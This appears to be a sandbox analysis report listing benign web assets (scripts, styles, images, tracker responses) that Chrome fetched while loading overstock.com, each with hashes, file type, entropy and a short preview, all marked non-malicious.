                                                                                                                                                                                    SSDEEP:24:jZZHZbJUpC9uVZbJUpCiFRFbD2m6TtAlgh9u6weRFtMqjxahBJxN3V9V:D5d8C0d8CmRFbTkAyttMqj4NxNl7
                                                                                                                                                                                    MD5:CBA84744239954F4992359DB4731EA6B
                                                                                                                                                                                    SHA1:71CC9125D202E51DEAA30E2C93A09A70BAD6F19E
                                                                                                                                                                                    SHA-256:C6A909270AF8FA7E818C664C3A8101260E7C6EE350E13BFFDBA23CBDE69BE9FD
                                                                                                                                                                                    SHA-512:5C839136D838B15D55B7C5CEF6A6EF9480FF9000F0F5A74DBD51F435707660BCC409AE6795FCB0A5622D4C65D0099AB6A628CD116C478265546D074CC392D69F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/subcollection-facets.js?v=138826656159800568381730157903
                                                                                                                                                                                    Preview:const subcollection=document.querySelector(".collection-block-subcollections");let url=new URL(window.location.href),params=new URLSearchParams(url.search);function updateLinks(){if(subcollection&&!subcollection.closest(".subcollection-area-rugs")){url=new URL(window.location.href),params=new URLSearchParams(url.search);const subParam=getParams()?"?"+getParams():"";subcollection.querySelectorAll("a").forEach(subLink=>{subLink.href=`${subLink.dataset.url}${subParam}`})}}function getParams(){let temp="";return params.forEach((value,key)=>{temp+=`${key}=${value}&`}),temp.slice(0,-1)}document.addEventListener("DOMContentLoaded",()=>{updateLinks()});const observer=new MutationObserver((mutationsList,observer2)=>{for(const mutation of mutationsList)(mutation.type==="childList"||mutation.type==="attributes")&&updateLinks()}),targetNode=document.querySelector("#sr-root"),config={childList:!0,subtree:!0,attributes:!0};targetNode&&observer.observe(targetNode,config);.//# sourceMappingURL=/cdn/sh
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (33053), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):33053
                                                                                                                                                                                    Entropy (8bit):5.188187057455003
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MEcHlQXprkgGrAmooeS+otFiVoegF2mU/lcxb59FCwOP9rP7wFSXOFSl4QJXNmxa:MEcH8ozOP9rvmxoeNmvn
                                                                                                                                                                                    MD5:A1A66FC12EF62C03D5B00CF666CE1B28
                                                                                                                                                                                    SHA1:A2459C8937399919061E1BB1D756A6F7CAB2BC98
                                                                                                                                                                                    SHA-256:2E35F0F4B80A5D3961802EE7AFEF160BC0AC24E235C3252EAD1BFC78BEF15B26
                                                                                                                                                                                    SHA-512:66EAECD5CC175FDCD327FA2131C8F539B6B55990B39D3B84F06F36169759C9FB007662714A24D9C8144673E1E6DFC9DE440643CEC37CF49C79DECC358FE53C7B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:var LZString=function(){var m=String.fromCharCode,n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",r={};function o(t,e){if(!r[t]){r[t]={};for(var n=0;n<t.length;n++)r[t][t.charAt(n)]=n}return r[t][e]}var s={compressToBase64:function(t){if(null==t)return"";var e=s._compress(t,6,function(t){return n.charAt(t)});switch(e.length%4){default:case 0:return e;case 1:return e+"===";case 2:return e+"==";case 3:return e+"="}},decompressFromBase64:function(e){return null==e?"":""==e?null:s._decompress(e.length,32,function(t){return o(n,e.charAt(t))})},compressToUTF16:function(t){return null==t?"":s._compress(t,15,function(t){return m(t+32)})+" "},decompressFromUTF16:function(e){return null==e?"":""==e?null:s._decompress(e.length,16384,function(t){return e.charCodeAt(t)-32})},compressToUint8Array:function(t){for(var e=s.compress(t),n=new Uint8Array(2*e.length),a=0,r=e.length;a<r;a++){var o=e.charCodeAt(a);n[2
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (28793)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):388491
                                                                                                                                                                                    Entropy (8bit):5.561360238735283
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:dZwYXRD2uwiztG3ETAavo9y0g5CptDY8/I8+yq/OUYhcDmKD0C8Gp/TRdcNp:dZwYt2KG3gPvo4M+GUTx0C8Gp/TRmX
                                                                                                                                                                                    MD5:0512BEDF1B82F335375E013467FEB885
                                                                                                                                                                                    SHA1:36DFACF04D2A8263521C4830E40972D9DDD8DD62
                                                                                                                                                                                    SHA-256:139EFBF9D31A452A19A376FB75F017F709EC24A1FD2B897A4781FF943EA9D54A
                                                                                                                                                                                    SHA-512:44ACCBC3BC76395AF81CFE176FD969DA1CB14FDFFC7B4771F9035EBB64B797C177EAE6071AAE3342AE1CBE17C0099011A449B74414709D15B172CA7671488601
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"134",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product"},{"function":"__jsm","vtp_javascript":["template","(function(){if(",["escape",["macro",1],8,16],"){if(",["escape",["macro",1],8,16],".productTaxonomy){var a=",["escape",["macro",1],8,16],".productTaxonomy[0];var b=",["escape",["macro",1],8,16],".productTaxonomy[1];var c=",["escape",["macro",1],8,16],".productTaxonomy[2];var d=",["escape",["macro",1],8,16],".productTaxonomy[3];var e=",["escape",["macro",1],8,16],".productTaxonomy[4]}else a=",["escape",["macro",1],8,16],".category,b=",["escape",["macro",1],8,16],".category2,c=",["escape",["macro",1],8,16],".category3,d=",["escape",["macro",1],8,16],".category4,e=",["escape",["macro",1],8,16],".categor
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, original size modulo 2^32 173337
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):47050
                                                                                                                                                                                    Entropy (8bit):7.994715016984044
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:GU1OIgf9Z5Sup6dmR6D/KUTcp56/ZcvbF+E8ycJIPOtjfdj8Mo64et4T+z:GU1wlZ5Su8dmY/T856/KbF+E8yPOlfdF
                                                                                                                                                                                    MD5:7A760B7359E13D5E1F6D88E9AC460696
                                                                                                                                                                                    SHA1:1DECB64D58BB4167D11D9A1FA6AB3F48AC287F55
                                                                                                                                                                                    SHA-256:7FF869CB401A4278E0DF3D51BA1823EC226C73B9512E0F25BE0F61C841ADFE22
                                                                                                                                                                                    SHA-512:11D59F4D17B8E8D5F69D95C57E354400F8DEAB373B273A3331F2D0BFC3D2A1419C577AA6A6A0F4FAAC68ADBC20D0986E81185DE92CDC4935B2EF514787CD96BE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.evgnet.com/beacon/c556855555573h9jz3n3n3p091552376/overstock/scripts/evergage.min.js
                                                                                                                                                                                    Preview:...........i{.F.0.........DQ..d..<.,.J...82'O.h..@.&H-.y~...^.X...d.{.;.."..^.....k.%m.b4.....9....77..<O.Y.&s>c.|.M.[+t..(w..6.o>.....7..f....Mlk?.f..d.>~.c;.X..G....C.^3*.y..6Kg..W.$[L.v6.oFy{.3.X.O#Y.#6..6.A.Z.6Os.......O9...[6...h..l6o.m{./....Ng....v...,..|>.E....l.V.....hO.k..=....k..7..<.w..UnG.?JlY.=.....eS>._._..,..WapS.l&... .$...e.q0.z......3.G..t..`.....b.p.S.....t..;l:M.l..J..V...kX".....~......d...'.......'.4..t...3......^.@&...p7.N.z8d..zb.s......4.;+.e~yOV.y2.pYa..z.m.. ..e..y@M=\. o.>..&.....]D.`...X..b...j...mnF..q...l.....x4...>b.y6... .......4.1Y....E..Z..-;!l..6...Yv..p...g3.....m.../.y[aF{...Y......c...".h.4Zc...+*.......Y..!O.py{.->.|..~`./...<67k]I@.....{z.#.Y.V^..-..........".. ....wg:...~.S..t..~..C&......G.2...Uc.i\..6.d.6.3,G...(%...C....K.0..>{............. ....\n..[.z2.,....o..X.I;D......../..!.H.IN1......5P;.w.G...D!._..?..k5.ocw......%..`D.C...D].z.^.l=..p.6....|.z......a..../.mC...APS...p......t.......Gp..z.6~..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3803
                                                                                                                                                                                    Entropy (8bit):7.471878885523271
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/XrxHCY6iz4FZMfOuoA4Bq51Ix37FKQn:N2d4FefD8qPIxp
                                                                                                                                                                                    MD5:2488C2A50DE250A37A89577889B430F5
                                                                                                                                                                                    SHA1:60055561B1A834FE28AB26619F3FF2945ABDCB1D
                                                                                                                                                                                    SHA-256:758886603EE7D1C4654ADD44BBA8CC1268799F29642BD1DAD7CDDA885917E4BB
                                                                                                                                                                                    SHA-512:A8DE53F1A5B022CCCB1F2EC742B8D8D0F5B0B00B9A284BADD5CA96E5AA514C0146DDDD1CDE0589C5DD410AE597E90488D2B838AFF64DA86926A13EDCF6E12EFC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.....................................................................................=.x.Y..>v.s..)S.,>-..8.i...<.'O.q..d.roO9....;..JL;......gox..wIP.g^#...?.uRW..**.N..Qn...,....|W2.V.SW.4..T.SS*..h.KZ.....c!6.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):73134
                                                                                                                                                                                    Entropy (8bit):7.991730706284489
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:Vmrmseqb8rVxADz4y+2mkVPcfwdUFa0jUedlT0:VmrmseqbexAX4OufwmM0jHdlT0
                                                                                                                                                                                    MD5:6BB1A3462B72B45D7F8033EA25BCF1EB
                                                                                                                                                                                    SHA1:71B34CB0861DC51F4E5743647A07970598051C7A
                                                                                                                                                                                    SHA-256:2544F5767A624DEA5033FF42A74124286F33BC696EC4C44DBA7F56801967BA6C
                                                                                                                                                                                    SHA-512:499C0C376D33D516AFCB21075AAAB46C6908563852DE591C9FF6AC350D511A3C4D10F45E1CBD62028BE4A844EED8BF0D03C56B1500E0CCB948B98BA617C9384D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/07252023_MOPS_HP_Bath.jpg?imwidth=1920
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 t...0Q...*....>.j.P)&$"..). ..in.[F;d.}.]..o4..?w.2.y..nb....h.u....f.#...'h..........3.......?.......'......W....m.......?......A./.O..[.....%......O..<=Q...........~.............W...}}'~......_...?..{{}.F.O.>.E.3|P......C.t[.7....lL..>.E.3|P......C.t[.7....lL..>.E.3|P......C.t[.7....lL..>.E.3|P......C.t[.7....lL..>.E.3|P......C.t[.7....lL..>.E.3|P......C.t[.7....lL..>.E.3|P......C.t[.7....lL..>.E.3|P......C.t[.7....lL..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 250x250, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11949
                                                                                                                                                                                    Entropy (8bit):7.832907247585977
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:NWZUUo3R8z09TkuBY2xJW34LBmkp9tarjABzMGYNAJ0GVEXYHFxfR:NFR3RZTpFJWuPsr4zMGY8dx5
                                                                                                                                                                                    MD5:37BFE91EE95F85C0E4E0F2B452713956
                                                                                                                                                                                    SHA1:D99120F1214EE933E7B9AFC849CB2CB7BBA6691A
                                                                                                                                                                                    SHA-256:DAF09832A8588C0F2CF134CA94F7AC715043E1104D61E4CD6832CAEC466BC15A
                                                                                                                                                                                    SHA-512:666880294E38BFECD16F7848D881B97DC715161D3BDDBE2929EFAECF2FF54E636C27FF0402E2A61ABE42472594629E78D78DC68BE57B69C80853C517933B18EC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}..................................................................................................................................................................s............3Xb..dk.I)x.X............<.i;O...:r...l.p.}+...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):19
                                                                                                                                                                                    Entropy (8bit):3.576617644908667
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:PFBwn:9Sn
                                                                                                                                                                                    MD5:980021208D52C1907A8256F57F077691
                                                                                                                                                                                    SHA1:CC2EF6376333CDFB4E18210689B4FFAE4FD60C39
                                                                                                                                                                                    SHA-256:B5865D15F4439D43678F8F1165CA58106C42C0F1AFF9419DFC642FA4DCDAC269
                                                                                                                                                                                    SHA-512:ABC045334B3A69A098E0D5AC0F391F389350432E8090C379829C3E7722FB991CC19E1F419CF3A150FC8A9351D359C0C6944AE2D782FFE7C24A4B4027A6111028
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:RBAC: access denied
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):123
                                                                                                                                                                                    Entropy (8bit):5.4005246441786845
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:EkVh37REBlJQ3iNpJ88QwJA49kw8jjdhe:EouBlJ9NpJ/pJx9kw8jjdhe
                                                                                                                                                                                    MD5:BDEF758A19F536BB3D1759B8CB483367
                                                                                                                                                                                    SHA1:62892EC84690B5847A531496A2383B22A26D7382
                                                                                                                                                                                    SHA-256:B7428454F8539D3D30D7E38EE5FCEEBC91D69FDAE1C7CBB1571D3BDC926E44C9
                                                                                                                                                                                    SHA-512:5826E4C0683F204E069C88145E17B0CF4AD3B609ECBEF39F377FEA90E35E002DE73900C2C04E2ACBE8650931C67B60E3C673D8B52CA501E7A2A6F6D4DC3EE194
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://gum.criteo.com/sync?c=11&a=1&r=2&j=utag_handle_criteo_userid
                                                                                                                                                                                    Preview:utag_handle_criteo_userid({"status":"OK","userid":"p6AP-191Qlc1U0tVdGt1d0s5VzNpNWlKalMxRnRSV1A2QUpsczNtbkRhTDhMcmVzJTNE"});
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35301
                                                                                                                                                                                    Entropy (8bit):3.7748863897617997
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:rQkHuObSe7BmwZH4tbF5wXHlTgWcvU2x81mBRsKsXENJGZ8rqjPATxR5RsKsXENZ:pHleNbF0XcvHx8EkXkSATx6XkSATxPv
                                                                                                                                                                                    MD5:C9A4BA641899782E6C3B43A5EEC2533E
                                                                                                                                                                                    SHA1:24994D833EEF58ACAFB01C76B5C4751F089EFF7E
                                                                                                                                                                                    SHA-256:95730D480D39FF79CCBF835A0502F565034ABBB539D7D7F8D73140710E9A5585
                                                                                                                                                                                    SHA-512:3FCF5C9BE7CC24CE83CE2AC6CAE74949831FEB2306DDDE93AB7F1F69B2EF9BF48F92B9E447EB58F47B0713FB239A55378FF936F0DB95132A31D6D0CFE14D66D9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10282024-MOPS-COOP-v2-A2-DSK_.svg
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M291.891 239.468C290.041 239.468 288.191 239.468 286.341 239.468C286.341 234.68 286.341 229.783 286.341 224.995C282.315 224.995 278.398 224.995 274.371 224.995C274.371 229.783 274.371 234.68 274.371 239.468C272.521 239.468 270.889 239.468 269.039 239.468C269.039 228.695 269.039 217.922 269.039 207.148C270.78 207.148 272.521 207.148 274.262 207.148C274.262 212.263 274.262 217.378 274.262 222.492C278.289 222.492 282.315 222.492 286.341 222.492C286.341 217.378 286.341 212.372 286.341 207.148C288.3 207.148 290.15 207.148 292 207.148C291.891 217.813 291.891 228.695 291.891 239.468Z" fill="#10595B"/>.<path d="M93.6219 205.842C94.166 205.951 94.9277 206.169 95.7983 206.495C96.1247 206.604 96.6688 206.713 96.9953 206.931C98.0835 207.366 99.0628 207.91 99.9334 208.563C99.4981 209.978 99.0628 211.392 98.5187 212.807C98.3011 212.807 98.1923 212.807 98.1923 212.807C98.1923 212.807 98.0835 2
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (9525)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9621
                                                                                                                                                                                    Entropy (8bit):5.0828289966531575
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:64ZNjOWCwJRU7iwf3M6Qg0o3FBmuBm36tYuMP1l3UZ8:64DO/AS2wf3M6QtoVfBm3Oml3Uu
                                                                                                                                                                                    MD5:97B5E045D5611037BFAC18928955EB42
                                                                                                                                                                                    SHA1:ED33D6922E8D3697E459C01B6AB7ACA7A10BDE02
                                                                                                                                                                                    SHA-256:BCE47CA176F5AD52E870E9FAA1C8FD26B3D9209A2C5791C49E9AE9E7A4688C75
                                                                                                                                                                                    SHA-512:4BD18630BC19EFF7D30648E8E4B6B12096E524EFE65B73AF3BC206958D5577E1EFE9EE1A445CFD927C254A12038EAC4053AB3719E42F0C3983F73454C22373AD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/product.css?v=81253555964418955201730157903
                                                                                                                                                                                    Preview:.option-selector{padding:0;border:0}.option-selector:not(:last-child){margin-bottom:2rem}.option-selector .label{margin-bottom:.5em}.option-selector__label-value{font-weight:400}.option-selector__btns{margin-top:-12px}.opt-label{margin-top:12px;margin-inline-end:12px;border:var(--btn-border-width) solid rgba(var(--text-color)/.2);border-radius:var(--btn-border-radius, 0);cursor:pointer}.opt-label--btn{min-width:50px;padding:var(--btn-padding-y, 12px) 16px;background-color:rgba(var(--bg-color));color:rgb(var(--text-color))}.opt-label--btn:hover{background-color:rgba(var(--text-color)/.05)}.opt-btn:focus-visible+.opt-label{outline-offset:3px}.opt-btn:checked+.opt-label--btn{background-color:rgba(var(--bg-color));color:rgb(var(--text-color))}.opt-btn:checked+.opt-label:not(.opt-label--swatch):after,.is-unavailable+.opt-label .opt-label__media:after{content:"";display:block;position:absolute;top:0;left:0;width:100%;height:100%}.opt-btn:checked+.opt-label:not(.opt-label--swatch):after{borde
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (10966)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11046
                                                                                                                                                                                    Entropy (8bit):5.287509630101107
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:TA3IDZk6jqIxqwTh9Sq4Tk8pjrJfx5UhwEhdw6hp2h4OMghTxMmJkHhw2hl2QX:3DZk6LxvTh1SFx5dCwagMkOmSSCv
                                                                                                                                                                                    MD5:0C0766FDA4B06ECB7B2F30A7A5DC2F08
                                                                                                                                                                                    SHA1:D6C671ED34BC32C70097D17142A18E8B5E95FAEC
                                                                                                                                                                                    SHA-256:C917657BEDCA3C54045064205546102E61943E32E3105D949E0BEC8C4C7DEA1B
                                                                                                                                                                                    SHA-512:849E281088D005E486AE98CAF12EA327CE374E89AAB89DB78A8C30DC5E50839D7B709A337734AB59D37A5B574D24ACFC783B46B7D9A3043B5C6312F100901809
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[280,284],{36760:(t,e,r)=>{"use strict";r.r(e),r.d(e,{default:()=>O});var n=r(48812),i=r.n(n),o=r(43688),a=r.n(o),p=r(84960),s=r.n(p),l=r(85668),c=r(85876),u=r(76840),d=r(92552),h=r(91672),g=r(90736),m=r(8980),v=r(86440),y=r(95668),f=r(82132),_=r(65056),w=r(60360),C=r(6880),S=r(77e3),N=["localizations","merchantProperties","features"],x=function(t){function e(){return t.apply(this,arguments)||this}s()(e,t);var r=e.prototype;return r.componentDidMount=function(){var t,e,r=this.props,n=r.isLoading,i=r.config,o=r.getSnippets,a=r.getReviews,p=r.rollup,s=r.displayApi;("boolean"!=typeof n&&(i.batched_page_ids?o(s,i):a(s,i)),null!=p)&&(null===(t=(e=this.props).onLoad)||void 0===t||t.call(e))},r.componentDidUpdate=function(t,e){var r,n;null==t.rollup&&null!=this.props.rollup&&(null===(r=(n=this.props).onLoad)||void 0===r||r.call(n))},r.render=function(){var t=this.props,e=t.confi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8966)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9605
                                                                                                                                                                                    Entropy (8bit):5.3791643348616764
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:cmTHRJ1UEuUrK5DBOS0kLrQ13vZ9TETjfUHI1d382D9ZcIQKpfPe/XqMoZT0rY:cml5K5b/LrQ1fZ9TETjMHI1XZcnKpfG4
                                                                                                                                                                                    MD5:E28C0B89B510A91DC75384A877A3088F
                                                                                                                                                                                    SHA1:C73A8059570F247BC68AFF8D7B10038C8A7523E8
                                                                                                                                                                                    SHA-256:95894E15FAD39187210D4CE5DC436C8F379DC7D00362D5F90EE7FAB741224531
                                                                                                                                                                                    SHA-512:8E2F628C88599D32A4FE80C6D462E4244A6DC5D3C13C8807AD07789A8C5AAA456B3678251F2846E5744F965ADF877A089698731AEC3D9CEF318104631EA01DD5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/PayButtonSection.DAi6V-5g.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["ShopPayButtonContainer.Bi3TYY-J.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","context.C2MjukUF.js","useIsOriginatedFromShop.7toB9y1y.js","constants.Dgg9iUcT.js","useUnauthenticatedErrorModal.AwvSMfsF.js","Section.Dvvun2gq.js","assets/Section.sQehCocD.css","ShopPayLogo.MmDQrsit.js","assets/ShopPayLogo.D_HPU8Dh.css","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","useShowShopPayOptin.cjqea2Mu.js","RageClickCapture.BAiET0lR.js","MarketsProDisclaimer.D4Dihv-c.js","assets/RageClickCapture.DnkQ4tsk.css","assets/ShopPayButtonContainer.B0ZxHYBW.css"])))=>i.map(i=>d[i]);.import{e as b,b1 as X,dw as ee,c0 as k,at as te,aW as oe,dW as ne,bf as se,dO as R,a as o,a8 as w,d$ as re,ab as m,aa as f,d_ as ae,ei as ie,ej as ce,ek as ue,c as le,d as v,el as O,K as T,em as I,en as de,eo as pe,ep as he,eq as ye,er as Pe,y as g,es as me,et as V,by as W,eu as ge,ev as fe,ew as be,ex as _e,D as ve,bH as Se,bI as ke,_ as Ce,dz as Be,aG as Ee,ey as
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1354
                                                                                                                                                                                    Entropy (8bit):6.518291065540221
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:0TCIl/X2YlXWI2PUC4yFQwjZJ77DFllYMppOJVzvr:RIl/Xflg9FVJ7H+Nhj
                                                                                                                                                                                    MD5:978E17BE4FE516A8F19E3B4EC6979C1E
                                                                                                                                                                                    SHA1:7EB4DF0E44388EE006804B1C7E12E3F29AB0DDCD
                                                                                                                                                                                    SHA-256:99C2D6805C431222B581A22F0BC540862C2AC4070BC762725D93A9DE7DC22B71
                                                                                                                                                                                    SHA-512:7F0B990D6627557A2C925CF13C4E9933E4E890CBC7688FA30861CFF8ED8C321C33D7A2B0451A5C44BFD4C1A8692463EDF2F5520A61D6FAD2A567A3D6DD7CAFF0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e25e0449-1203-486e-a473-112cb2ea564f.jpg?v=1729322908&width=80
